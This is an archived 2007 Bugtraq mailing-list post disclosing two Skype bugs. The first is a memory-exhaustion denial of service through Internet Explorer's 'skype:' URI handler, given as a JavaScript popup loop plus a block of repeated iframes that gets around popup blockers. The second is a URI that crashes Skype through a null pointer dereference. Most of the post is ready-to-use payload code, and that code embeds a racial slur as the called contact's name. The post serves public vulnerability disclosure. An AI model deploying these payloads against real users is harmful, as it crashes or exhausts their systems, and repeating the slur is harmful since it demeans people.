| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 25 Nov 2007 19:50:55 -0000
From: mail@...not
To: bugtraq@...urityfocus.com
Subject: Skype DoS
1. Skype and Internet Explorer uri handler mechanism memory resources consumption bug:
<script>
for (var x = 1; x <= 666; x++)
{
popup_window = window.open('skype:happy_negro?call');
popup_window.close ();
}
</script>
This will invoke many skype.exe processes and as they are not closed - much memory will be consumed. Such script will be blocked by popup blocker, so it is possible to do it other way:
<iframe src="skype:happy_negro?call"></iframe><iframe src="skype:happy_negro?call"></iframe>
<iframe src="skype:happy_negro?call"></iframe><iframe src="skype:happy_negro?call"></iframe>
<iframe src="skype:happy_negro?call"></iframe><iframe src="skype:happy_negro?call"></iframe>
... I've used about megabyte of such crap
<iframe src="skype:happy_negro?call"></iframe><iframe src="skype:happy_negro?call"></iframe>
Tested on IE7, WinXP SP2 and skype 3.6.0.216
2. Unexploitable Skype null pointer dereference:
skype:?voicemail
To trigger the bug a right mouse button must be clicked, or menu button selected. Skype should crash :)
Found here: http://www.critical.lt/?opinions/show/1433
credits: Critical Security
Powered by blists - more mailing lists